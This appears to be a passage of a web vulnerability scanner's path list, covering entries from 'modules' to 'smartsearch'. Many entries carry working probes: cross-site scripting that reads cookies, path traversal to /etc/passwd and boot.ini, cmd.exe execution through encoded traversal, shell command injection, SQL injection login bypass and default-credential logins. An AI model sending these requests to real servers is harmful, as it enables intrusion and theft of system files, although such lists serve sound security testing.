+modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>
+modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>
+modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>
+modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>
+modules/Search/index.php
+modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
+modules/WebChat/in.php+
+modules/WebChat/out.php
+modules/WebChat/quit.php
+modules/WebChat/users.php
+modules/Your_Account/navbar.php+
+moin.cgi?test
+mojo/mojo.cgi
+moregroupware/modules/webmail2/inc/
+movimientos/
+mp3/
+mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
+mqseries/
+mrtg.cfg?cfg=../../../../../../../../etc/passwd
+mrtg.cgi?cfg=../../../../../../../../etc/passwd
+mrtg.cgi?cfg=blah
+ms_proxy_auth_query/
+msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
+msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
+msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
+msadc/msadcs.dll
+msadc/samples/adctest.asp
+msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>
+msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>
+msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>
+msdwda.nsf
+mspress30/
+msql/
+msword/
+mt-static/
+mt-static/mt-check.cgi
+mt-static/mt-load.cgi
+mt-static/mt.cfg
+mt/
+mt/mt-check.cgi
+mt/mt-load.cgi
+mt/mt.cfg
+mtatbls.nsf
+mtdata/mtstore.nsf
+mtstore.nsf
+multihtml.pl?multi=/etc/passwd%00html
+musicqueue.cgi
+myguestBk/add1.asp?|-|0|404_Object_Not_Found
+myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
+myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
+myguestbook.cgi?action=view
+myhome.php?action=messages&box=<script>alert('Vulnerable')</script>
+myinvoicer/config.inc
+mylog.html?screen=/etc/passwd
+mylog.phtml?screen=/etc/passwd
+myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
+myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
+mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
+na_admin/
+na_admin/ataglance.html
+namazu.cgi
+names.nsf
+nav/cList.php?root=</script><script>alert('Vulnerable')/<script>
+nbmember.cgi?cmd=list_all_users
+ncl_items.html
+ncl_items.shtml?SUBJECT=1
+ncommerce3/ExecMacro/macro.d2w/%0a%0a
+ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
+netauth.cgi?cmd=show&page=../../../../../../../../../../etc
+netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
+netbasic/websinfo.bas
+netget?sid=Safety&amp;msg=2002&amp;file=Safety
+netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
+netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
+nethome/
+netpad.cgi
+netscape/
+netutils/findata.stm?host=<script>alert(document.cookie)</script>
+netutils/findata.stm?user=<script>alert(document.cookie)</script>
+netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
+netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>
+new
+new/
+news
+news/news.mdb
+newsdesk.cgi?t=../../../../../../../../../../etc
+newsdesk.cgi?t=../../../../../../../../../../etc/passwd
+newtopic.php
+newuser?Image=../../database/rbsserv.mdb
+nikto.ida
+nimages.php
+nl/
+nlog-smb.cgi
+nlog-smb.pl
+nntp/nd000000.nsf
+nntp/nd000001.nsf
+nntp/nd000002.nsf
+nntp/nd000003.nsf
+nntp/nd000004.nsf
+nntppost.nsf
+node/view/666\"><script>alert(document.domain)</script>
+non-existent.pl
+noshell
+nosuchurl/><script>alert('Vulnerable')</script>
+notes.nsf
+noticias/
+nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
+nph-error.pl
+nph-exploitscanget.cgi
+nph-maillist.pl
+nph-publish
+nph-publish.cgi
+nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
+nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
+nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
+nph-test-cgi
+nphp/nphpd.php
+npn_admn.nsf
+npn_rn.nsf
+ns-icons/
+nsn/..%5Cutil/attrib.bas
+nsn/..%5Cutil/chkvol.bas
+nsn/..%5Cutil/copy.bas
+nsn/..%5Cutil/del.bas
+nsn/..%5Cutil/dir.bas
+nsn/..%5Cutil/dsbrowse.bas
+nsn/..%5Cutil/glist.bas
+nsn/..%5Cutil/lancard.bas
+nsn/..%5Cutil/md.bas
+nsn/..%5Cutil/rd.bas
+nsn/..%5Cutil/ren.bas
+nsn/..%5Cutil/send.bas
+nsn/..%5Cutil/set.bas
+nsn/..%5Cutil/slist.bas
+nsn/..%5Cutil/type.bas
+nsn/..%5Cutil/userlist.bas
+nsn/..%5Cweb/env.bas
+nsn/..%5Cweb/fdir.bas
+nsn/..%5Cwebdemo/env.bas
+nsn/..%5Cwebdemo/fdir.bas
+nsn/env.bas
+nsn/fdir.bas
+nsn/fdir.bas:ShowVolume
+ntitar.pl
+ntsync4.nsf
+ntsync45.nsf
+nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
+nul..cfm
+nul..dbm
+nul.cfm
+nul.dbm
+null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
+oc/Search/SQLQHit.asp
+oc/Search/sqlqhit.asp
+odbc/
+oekaki/
+oem_webstage/cgi-bin/oemapp_cgi
+oem_webstage/oem.conf
+officescan/cgi/cgiChkMasterPwd.exe
+officescan/cgi/jdkRqNotify.exe
+officescan/hotdownload/ofscan.ini
+ojspdemos/basic/hellouser/hellouser.jsp
+ojspdemos/basic/simple/usebean.jsp
+ojspdemos/basic/simple/welcomeuser.jsp
+old/
+open?
+openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;
+openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
+opendir.php?/etc/passwd
+opendir.php?requesturl=/etc/passwd
+oprocmgr-status
+options.inc.php+
+options.php?optpage=<script>alert('Vulnerable!')</script>
+oracle
+oradata/
+order/
+order/order_log.dat
+order/order_log_v12.dat
+orders/
+orders/checks.txt
+orders/mountain.cfg
+orders/order_log.dat
+orders/order_log_v12.dat
+orders/orders.log
+orders/orders.txt
+oscommerce/default.php
+outgoing/
+owa_util%2esignature
+ows-bin/oaskill.exe?abcde.exe
+ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
+ows-bin/perlidlc.bat?&dir
+ows/
+ows/restricted%2eshow
+pafiledb/includes/team/file.php
+page.cgi?../../../../../../../../../../etc/passwd
+pagelog.cgi
+pages/
+pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+pals-cgi?palsAction=restart&documentName=/etc/passwd
+parse-file
+parse_xml.cgi
+pass
+pass_done.php
+passwd
+passwd.adjunct
+passwd.txt
+passwdfile
+password
+password.inc
+password/
+passwords.txt
+passwords/
+path/nw/article.php?id='
+pbcgi.cgi?name=Joe%Camel&email=%3C
+pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
+pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+pbserver/pbserver.dll
+pccsmysqladm/incs/dbconnect.inc
+pdf/
+people.list
+perl
+perl-status
+perl.exe
+perl.exe?-v
+perl/
+perl/-e%20%22system('cat%20/etc/passwd');\%22
+perl/-e%20print%20Hello
+perl/env.pl
+perl/files.pl
+perl/printenv
+perl/samples/env.pl
+perl/samples/lancgi.pl
+perl/samples/ndslogin.pl
+perl/samples/volscgi.pl
+perl5/
+perl5/files.pl
+perl?-v
+perlshop.cgi
+perweb.nsf
+pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
+pfdispaly.cgi?../../../../../../../../../../etc
+pfdispaly.cgi?../../../../../../../../../../etc/passwd
+pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
+pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
+phf
+phf.cgi?QALIA
+phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
+phf?Qname=root%0Acat%20/etc/passwd%20
+phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
+phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
+phorum/admin/stats.php
+photo/
+photo/manage.cgi
+photo/protected/manage.cgi
+photo_album/apa_phpinclude.inc.php
+photodata/
+photodata/manage.cgi
+php-cgi
+php-coolfile/action.php?action=edit&file=config.php
+php.cgi?/etc/passwd
+php.ini
+php/
+php/gaestebuch/admin/index.php
+php/index.php
+php/mlog.html
+php/mlog.phtml
+php/mylog.html?screen=/etc/passwd
+php/mylog.phtml?screen=/etc/passwd
+php/php.exe?c:\boot.ini
+php/php.exe?c:\winnt\boot.ini
+php/php4ts.dll
+phpBB/phpinfo.php
+phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>
+phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>
+phpBB2/includes/db.php
+phpBB2/search.php?search_id=1\
+phpEventCalendar/file_upload.php
+phpMyAdmin/
+phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>
+phpimageview.php?pic=javascript:alert('Vulnerable')
+phpinfo.php
+phpinfo.php3
+phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>
+phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
+phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>
+phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>
+phpmyadmin/
+phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
+phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
+phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
+phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
+phprocketaddin/?page=../../../../../../../../../../boot.ini
+phprocketaddin/?page=../../../../../../../../../../etc/passwd
+phpshare/phpshare.php
+phptonuke.php?filnavn=/etc/passwd
+phptonuke.php?filnavn=<script>alert('Vulnerable')</script>
+phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
+phpwebfilemgr/index.php?f=../../../../../../../../../etc
+phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
+phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>
+phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
+phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>
+phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]
+phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>
+pics/
+piranha/secure/passwd.php3
+pix/
+pks/lookup
+pls/admin
+pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>
+pls/help/<script>alert('Vulnerable')</script>
+pls/ldc/admin_/
+pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT
+pls/portal/HTP.PRINT
+pls/portal/PORTAL.home
+pls/portal/PORTAL.wwa_app_module.link
+pls/portal/PORTAL.wwv_dynxml_generator.show
+pls/portal/PORTAL.wwv_form.genpopuplist
+pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO
+pls/portal/PORTAL.wwv_setting.render_css
+pls/portal/PORTAL.wwv_ui_lovf.show
+pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
+pls/portal/SELECT
+pls/portal/null
+pls/portal/owa_util.cellsprint?p_theQuery=select
+pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users
+pls/portal/owa_util.listprint?p_theQuery=select
+pls/portal/owa_util.show_query_columns?ctable=sys.dba_users
+pls/portal/owa_util.showsource?cname=owa_util
+pls/portal/owa_util.signature
+pls/portal30/admin_/
+pls/sample/admin_/help/..%255cplsql.conf
+pls/simpledad/admin_/
+pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
+pls/simpledad/admin_/dadentries.htm
+pls/simpledad/admin_/gateway.htm?schema=sample
+pls/simpledad/admin_/globalsettings.htm
+plusmail
+pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
+pm/lib.inc.php
+pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1
+pmlite.php
+pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
+poll
+pollit/Poll_It_
+pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
+polls
+pollssi.cgi
+poppassd.php3+
+porn/
+post-query
+post16.exe
+post32.exe|dir%20c:\\
+post_query
+postcards.cgi
+postinfo.html
+postnuke/html/index.php?module=My_eGallery
+postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
+postnuke/index.php?module=My_eGallery
+postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft
+powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
+powerup/r.cgi?FILE=../../../../../../../../../../passwd
+pp.php?action=login
+ppdscgi.exe
+pr0n/
+prd.i/pgen/
+printenv
+printenv.tmp
+privado/
+private.nsf
+private/
+probecontrol.cgi?command=enable&username=cancer&password=killer
+processit.pl
+prod/
+produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
+product_info.php
+productcart/database/EIPC.mdb
+productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
+profile.cgi
+profile.php?u=JUNK(8)
+profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+project/index.php?m=projects&user_cookie=1
+prometheus-all/index.php
+pron/
+proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\"
+protected/
+protected/secret.html+
+protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;
+protection.php
+proxy/ssllogin?user=administrator&password=administrator
+proxy/ssllogin?user=administrator&password=operator
+proxy/ssllogin?user=administrator&password=user
+prueba/
+pruebas/
+prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+pt_config.inc
+ptg_upgrade_pkg.log
+pu3.pl
+pub/
+pub/english.cgi?op=rmail
+public.nsf
+public/
+publica/
+publicar/
+publico/
+publisher/
+publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
+purchase/
+purchases/
+put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
+pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20
+pvote/ch_info.php?newpass=password&confirm=password%20
+pvote/del.php?pollorder=1%20
+pw/
+pw/storemgr.pw
+pwd.db
+python/
+qpadmin.nsf
+query
+query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+query?mss=%2e%2e/config
+quickplace/quickplace/main.nsf
+quickstart/qstart50.nsf
+quickstart/wwsample.nsf
+quickstore.cgi?page=../../../../../../../../../../etc
+quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
+quikmail/nph-emumail.cgi?type=../%00
+quikstore.cfg
+quikstore.cgi
+quizme.cgi
+r.cgi?FILE=../../../../../../../../../../etc
+r.cgi?FILE=../../../../../../../../../../etc/passwd
+ratlog.cgi
+reademail.pl
+readme
+readme.eml
+readme.nsf
+readme.txt
+readmec.nsf
+readmes.nsf
+redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
+redirect
+register.cgi
+register/
+registered/
+replicator/webpage.cgi/
+replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>
+reports.nsf
+reports/
+reports/rwservlet
+reports/rwservlet/getjobid4?server=myrep
+reports/rwservlet/getjobid7?server=myrep
+reports/rwservlet/showenv
+reports/rwservlet/showjobs
+reports/rwservlet/showmap
+reports/rwservlet/showmap?server=myserver
+reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
+reports/temp/
+reseller/
+responder.cgi
+restricted/
+retail/
+retrieve_password.pl
+reviews/newpro.cgi
+rguest.exe
+rightfax/fuwww.dll/?
+rksh
+rmp_query
+robadmin.cgi
+robpoll.cgi
+room/save_item.php
+root
+root/
+rpc.php?q="><script>alert(document.cookie)</script>
+rpc.php?q='&t='
+rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+rpm_query
+rsh
+rtm.log
+rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
+rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
+rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
+rwcgi60
+rwcgi60/showenv
+rwwwshell.pl
+sales/
+sam
+sam._
+sam.bin
+sample/
+sample/faqw46
+sample/framew46
+sample/pagesw46
+sample/siregw46
+sample/site1w4646
+sample/site2w4646
+sample/site3w4646
+samples/
+samples/search.dll?query=<script>alert(document.cookie)</script>
+samples/search/queryhit.htm
+save/
+sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
+sawmill?rfcf+%22
+sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
+sbcgi/sitebuilder.cgi
+sca/menu.jsp
+schema50.nsf
+scoadminreg.cgi
+scozbook/view.php?PG=whatever
+scr/
+scratch
+screen.php
+script>alert('Vulnerable')</script>.cfm
+scripts
+scripts/*%0a.pl
+scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
+scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
+scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
+scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"
+scripts/CGImail.exe
+scripts/Carello/Carello.dll
+scripts/admin.pl
+scripts/cfgwiz.exe
+scripts/contents.htm
+scripts/convert.bas
+scripts/counter.exe
+scripts/cphost.dll
+scripts/cpshost.dll
+scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
+scripts/fpadmcgi.exe
+scripts/fpadmin.htm
+scripts/fpcount.exe
+scripts/fpremadm.exe
+scripts/fpsrvadm.exe
+scripts/httpodbc.dll
+scripts/iisadmin/bdir.htr
+scripts/iisadmin/ism.dll
+scripts/no-such-file.pl
+scripts/postinfo.asp
+scripts/proxy/w3proxy.dll
+scripts/repost.asp
+scripts/root.exe?/c+dir+c:\+/OG
+scripts/samples/ctguestb.idc
+scripts/samples/search/author.idq
+scripts/samples/search/filesize.idq
+scripts/samples/search/filetime.idq
+scripts/samples/search/qfullhit.htw
+scripts/samples/search/qsumrhit.htw
+scripts/samples/search/queryhit.idq
+scripts/samples/search/simple.idq
+scripts/samples/search/webhits.exe
+scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]
+scripts/tools/ctss.idc
+scripts/tools/dsnform
+scripts/tools/dsnform.exe
+scripts/tools/getdrvrs.exe
+scripts/tools/newdsn.exe
+scripts/tradecli.dll
+scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
+scripts/weblog
+scripts/wsisa.dll/WService=anything?WSMadmin
+se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
+search.asp?Search=
+search.asp?Search=\">&lt;script&gt;alert(Vulnerable)&lt;/script&gt;
+search.asp?term=<%00script>alert('Vulnerable')</script>
+search.cgi
+search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
+search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search
+search.php?searchfor=\"><script>alert('Vulnerable');</script>
+search.php?searchstring=<script>alert(document.cookie)</script>
+search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+search.php?zoom_query=<script>alert(\"hello\")</script>
+search.pl
+search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
+search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script>
+search.pl?form=../../../../../../../../../../etc
+search.pl?form=../../../../../../../../../../etc/passwd%00
+search.vts
+search/
+search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
+search/SQLQHit.asp
+search/htx/SQLQHit.asp
+search/htx/sqlqhit.asp
+search/inc/
+search/index.cfm?<script>alert(\"Vulnerable\")</script>
+search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;
+search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
+search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../etc
+search/sqlqhit.asp
+search97.vts
+search?NS-query-pat=../../../../../../../../../../etc/passwd
+search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
+secret.nsf
+secret/
+secure/
+securecontrolpanel/
+secured/
+securelogin/1,2345,A,00.html
+security/web_access.html
+sell/
+sendform.cgi
+sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
+sendphoto.php
+sendtemp.pl?templ=../../../../../../../../../../etc
+sendtemp.pl?templ=../../../../../../../../../../etc/passwd
+sensepost.exe?/c+dir
+server-info
+server-status
+server/
+server_stats/
+servers/link.cgi
+service/
+services/
+servicio/
+servicios/
+servlet/AdminServlet
+servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>
+servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>
+servlet/Counter
+servlet/DateServlet
+servlet/FingerServlet
+servlet/HelloWorldServlet
+servlet/IsItWorking
+servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
+servlet/PrintServlet
+servlet/SchedulerTransfer
+servlet/SearchServlet
+servlet/ServletManager
+servlet/SessionManager
+servlet/SessionServlet
+servlet/SimpleServlet
+servlet/SnoopServlet
+servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a
+servlet/allaire.jrun.ssi.SSIFilter
+servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
+servlet/com.newatlanta.servletexec.JSP10Servlet/
+servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
+servlet/com.unify.servletexec.UploadServlet
+servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>
+servlet/gwmonitor
+servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
+servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
+servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
+servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
+servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
+servlet/sq1cdsn
+servlet/sqlcdsn
+servlet/sunexamples.BBoardServlet
+servlet/webacc
+servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
+servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
+servlet/webacc?User.html=noexist
+servlet/webpub
+servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
+servlets/SchedulerTransfer
+servlets/weboam/oam/oamLogin
+session/adminlogin
+session/admnlogin
+setpasswd.cgi
+settings/site.ini
+setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P
+setup.nsf
+setup/
+setupweb.nsf
+sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
+sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
+sh
+shop.cgi?page=../../../../../../../etc/passwd
+shop.pl/page=;cat%20shop.pl|
+shop/
+shop/auth_data/auth_user_file.txt
+shop/database/metacart.mdb
+shop/member_html.cgi?file=;cat%20/etc/passwd|
+shop/member_html.cgi?file=|cat%20/etc/passwd|
+shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;
+shop/normal_html.cgi?file=../../../../../../etc/issue%00
+shop/normal_html.cgi?file=;cat%20/etc/passwd|
+shop/normal_html.cgi?file=|cat%20/etc/passwd|
+shop/orders/orders.txt
+shop/php_files/site.config.php+
+shop/search.php
+shop/show.php
+shopa_sessionlist.asp
+shopadmin.asp
+shopadmin.asp?Password=abc&UserName="><script>alert(foo)</script>
+shopdbtest.asp
+shopexd.asp?catalogid='42
+shoponline/fpdb/shop.mdb
+shopper.cgi?newpage=../../../../../../../../../../etc
+shopper.cgi?newpage=../../../../../../../../../../etc/passwd
+shopper/
+shopping/database/metacart.mdb
+shopping/diag_dbtest.asp
+shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
+shopping300.mdb
+shopping400.mdb
+shoppingdirectory/midicart.mdb
+shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
+shoutbox.php?conf=../../../../../../../etc/passwd
+shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
+show.pl
+showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
+showcheckins.cgi?person=<script>alert('Vulnerable')</script>
+showcheckins.cgi?person=<script>alert('XSS')</script>
+showmail.pl
+showmail.pl?Folder=<script>alert(document.cookie)</script>
+showuser.cgi
+shtml.dll
+signon
+simple/view_page?mv_arg=|cat%20/etc/passwd|
+simplebbs/users/users.php
+simplestguest.cgi
+simplestmail.cgi
+sips/sipssys/users/a/admin/user
+site/'
+site/eg/source.asp
+site/iissamples/
+site_searcher.cgi
+sitemap.xml
+siteminder
+siteminder/smadmin.html
+siteseed/
+siteserver/publishing/viewcode.asp?source=/default.asp
+smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
